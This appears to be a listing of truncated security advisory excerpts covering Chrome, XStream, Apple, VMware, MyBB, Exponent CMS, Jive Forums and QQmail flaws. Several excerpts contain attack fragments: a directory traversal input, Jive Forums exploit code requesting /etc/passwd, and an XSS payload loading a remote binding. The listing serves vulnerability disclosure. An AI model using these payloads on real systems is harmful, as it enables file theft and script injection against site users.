chromium -- multiple security fixes

Chrome Releases reports: This update includes 4 security fixes: 324596281 High CVE-2024-1938: Type Confusion in V8. Reported by 5f46f4ee2e17957ba7b39897fb376be8 on 2024-02-11 323694592 High CVE-2024-1939: Type Confusion in V8. Reported by Bohan Liu @P4nda20371774 of Tencent Security Xuanwu Lab on...

XStream is vulnerable to a Remote Command Execution attack

Impact The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required...

XStream is vulnerable to a Remote Command Execution attack

Impact The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required...

About the security content of iCloud for Windows 7.9 - Apple Support

About Apple security updates For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page. For more information about security, se...

About the security content of Safari 11.0.1 - Apple Support

About Apple security updates For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page. For more information about security, se...

MyBB Directory Traversal

Description: ============ product:MyBB Homepage:https://mybb.com/ vulnerable version:input'pathfolder'; Line 327 $dir = @opendirMYBBROOT.$path; if we input "pathfolder" to "../../bypass/smile",Directory Traversal success! ============ Fixed: ============ This vulnerability was fixed in version...

VMSA-2017-0006 : VMware ESXi, Workstation and Fusion updates address critical and moderate security issues

a. ESXi, Workstation, Fusion SVGA memory corruption ESXi, Workstation, Fusion have a heap buffer overflow and uninitialized stack memory usage in SVGA. These issues may allow a guest to execute code on the host. VMware would like to thank ZDI and Team 360 Security from Qihoo for reporting these...

Hackers Using Fake Cellphone Towers to Spread Android Banking Trojan

Chinese Hackers have taken Smishing attack to the next level, using rogue cell phone towers to distribute Android banking malware via spoofed SMS messages. SMiShing — phishing attacks sent via SMS — is a type of attack wherein fraudsters use number spoofing attack to send convincing bogus message...

Exponent CMS 2.4.0 Blind SQL Injection

Document Title: =============== Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 References Source: ==================== https://exponentcms.lighthouseapp.com/projects/61783/tickets/1394-blind-sql-injection-vulnerability-in-exponent-cms-240-4...

Pwn2Own Day Two: Safari, Microsoft Edge Go Down Winner Announced

In the end, it was a nail-biter pitting Tencent Security Team Sniper KeenLab and PC Manager against JungHoon Lee lokihardt for the title of Master of Pwn for Pwn2Own 2016. After a tense last two minutes of the competition, it was Tencent Security Team Sniper and its successful code execution of a...

Jive Forums 5.5.25 Directory Traversal

JiveForums " print " Usage: %s http://localhost /jiveforums/" % sys.argv0 sys.exit payload = 'servlet/JiveServlet?attachImage=true&attachment=/.././.././.././.././.././.././.././../etc/./passwd%00&contentType=image%2Fpjpeg' print "+ Trying to request :"+sys.argv1+sys.argv2+paylo...

Jive Forums 5.5.25 - Directory Traversal

Exploit for jsp platform in category web applications ''' JiveForums " print " Usage: %s http://localhost /jiveforums/" % sys.argv0 sys.exit payload = 'servlet/JiveServlet?attachImage=true&attachment=/.././.././.././.././.././.././.././../etc/./passwd%00&contentType=image%2Fpjpeg' print "+ Trying...

APPLE-SA-2014-02-25-3 QuickTime 7.7.5

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-02-25-3 QuickTime 7.7.5 QuickTime 7.7.5 is now available and addresses the following: QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Playing a maliciously crafted movie file may lead to an unexpected application...

QQmail Multiple Xss Vulnerabilities-vulnerability warning-the black bar safety net

QQmail Multiple Xss Vulnerabilities Author: www.80vul.com 1. firefox2 css xss vulnerabilities styleBODY-moz-binding:url"http://www.80vul.coom/test.xmlxss"/style test.xml: ? xml version="1.0"?& gt; bindings xmlns="" binding id="xss" implementation constructor! CDATAalert'XSS'/constructor...